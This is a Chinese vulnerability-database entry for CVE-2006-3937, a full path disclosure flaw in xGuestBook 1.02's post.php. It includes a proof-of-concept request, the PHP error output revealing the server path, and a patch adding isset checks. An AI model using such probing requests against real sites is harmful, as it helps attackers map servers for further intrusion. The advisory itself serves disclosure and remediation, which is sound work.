x_atrix xGuestBook 'post.php' 信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193955 漏洞类型 未知
发布时间 2006-07-31 更新时间 2006-07-31
CVE编号 CVE-2006-3937 CNNVD-ID CNNVD-200607-508
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/82967
https://cxsecurity.com/issue/WLB-2006080013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-508
|漏洞详情
x_atrixxGuestBook1.02中的post.php可以使远程攻击者借助可在出错信息中显示安装路径的,不包含(1)user,(2)mail,(3)p,或(4)url参数的请求,获得敏感信息。
|漏洞EXP
###################Dicomdk####################

Full Path Disclosure xGuestBook v1.02        #

#

http://xatrix.xa.funpic.de/xguestbook2/      #

#

By : X-boy                                   #

##############################################

http://[HOST]/post.php

Test : http://xatrix.xa.funpic.de/xguestbook2/post.php

Result :

========

Notice: Undefined index: user in [site]\post.php on line 15

Notice: Undefined index: mail in [site]\post.php on line 16

Notice: Undefined index: p in [site]\post.php on line 17

Notice: Undefined index: url in [site]\post.php on line 19

##############################################

Patch :                                      #

##############################################

-Open post.php

-Find :

$user  = HTMLSPECIALCHARS(trim($_POST['user']));

$email = HTMLSPECIALCHARS(trim($_POST['mail']));

$post  = nl2br(HTMLSPECIALCHARS($_POST['p']));

$post  = str_replace("  "," ",$post);

$url   = HTMLSPECIALCHARS(trim($_POST['url']));

$date  = date("Y-m-d g:i:s");

-Change to :

if (isset($_POST['user']) AND isset($_POST['mail']) AND isset($_POST['p']) AND isset($_POST['url']))

{

$user  = HTMLSPECIALCHARS(trim($_POST['user']));

$email = HTMLSPECIALCHARS(trim($_POST['mail']));

$post  = nl2br(HTMLSPECIALCHARS($_POST['p']));

$post  = str_replace("  "," ",$post);

$url   = HTMLSPECIALCHARS(trim($_POST['url']));

$date  = date("Y-m-d g:i:s");

}

##############################################
|受影响的产品
Xguestbook Xguestbook 1.02
|参考资料

来源:XF
名称:xguestbook-post-path-disclosure(27979)
链接:http://xforce.iss.net/xforce/xfdb/27979
来源:BUGTRAQ
名称:20060725FullPathDisclosurexGuestBookv1.02
链接:http://www.securityfocus.com/archive/1/archive/1/441170/100/0/threaded
来源:SREASON
名称:1304
链接:http://securityreason.com/securityalert/1304